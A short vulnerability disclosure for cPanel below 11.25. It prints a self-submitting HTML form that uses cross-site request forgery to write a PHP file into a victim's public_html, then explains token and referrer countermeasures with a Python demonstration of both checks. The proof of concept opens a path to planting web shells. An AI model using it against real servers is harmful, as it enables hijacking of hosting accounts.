cPanel 11.25 CSRF vulnerability to upload any PHP script
cPanel versions below and excluding 11.25 are vulnerable to CSRF, which lets an attacker upload a PHP script of their choosing. If you have turned off security tokens and the referrer security check, you are vulnerable as well, no matter what version you are using.
script:
<form name="editform" action="http://localhost:2082/frontend/x3/err/savefile.html" method=POST
onSubmit="return loadfdata();">
<input type="hidden" id="codepage" class="codepress html" name="page"
value="<?php echo 'ninjashell'; ?>">
<input type="hidden" name="domain" value="localhost">
<input type="hidden" value="public_html/" name="dir">
<input type="hidden" value="ninjashell.php" name="file">
<body onload="document.forms.editform.submit();">
Afterwards simply check for ninjashell.php in the directory.
Counter-measures
All cPanel versions starting from 11.25 and above have two built-in security features to prevent such attacks: security tokens and the referrer security check. This means that if you are a cPanel client, you should update your software.
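How the two checks reject the cross-site form above, as an added Python example (not cPanel's own code and not part of the original post). The function names, the /cpsess<token>/ path-prefix layout and the sample Referer values are assumptions made for illustration; the host and endpoint are the ones in the form.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SERVER = "localhost:2082"                      # host:port from the page's form
SAVEFILE = "/frontend/x3/err/savefile.html"    # endpoint from the page's form


def check_request(method, path, headers, session_token,
                  require_token=True, require_referrer=True):
    """Decide whether a request that carries a valid session cookie is accepted."""
    if require_token:
        # Assumed layout: the token is the first path segment, /cpsess<token>/...
        first = path.lstrip("/").split("/", 1)[0]
        supplied = first[len("cpsess"):] if first.startswith("cpsess") else ""
        if not supplied or not hmac.compare_digest(supplied.encode(),
                                                   session_token.encode()):
            return False, "security token missing or wrong"
    if require_referrer and method.upper() == "POST":
        # A cross-site form submits with the foreign page (or nothing) as Referer.
        if urlsplit(headers.get("Referer", "")).netloc != SERVER:
            return False, "referrer is not this server"
    return True, "accepted"


def demo():
    token = secrets.token_hex(8)               # issued at login, unknown to other sites
    own = {"Referer": f"http://{SERVER}/cpsess{token}/frontend/x3/"}   # constructed
    foreign = {"Referer": "http://attacker.example/page.html"}         # constructed
    return {
        "forged": check_request("POST", SAVEFILE, foreign, token),
        "forged_guess": check_request("POST", "/cpsess" + "0" * 16 + SAVEFILE,
                                      foreign, token),
        "leaked_token": check_request("POST", f"/cpsess{token}{SAVEFILE}", foreign, token),
        "legitimate": check_request("POST", f"/cpsess{token}{SAVEFILE}", own, token),
        "checks_off": check_request("POST", SAVEFILE, foreign, token,
                                    require_token=False, require_referrer=False),
    }


if __name__ == "__main__":
    for name, (ok, reason) in demo().items():
        print(f"{name:13} {'ALLOW' if ok else 'DENY '} {reason}")
```

The "checks_off" case is the configuration the post warns about: with both features disabled, the session cookie alone authorises the forged POST.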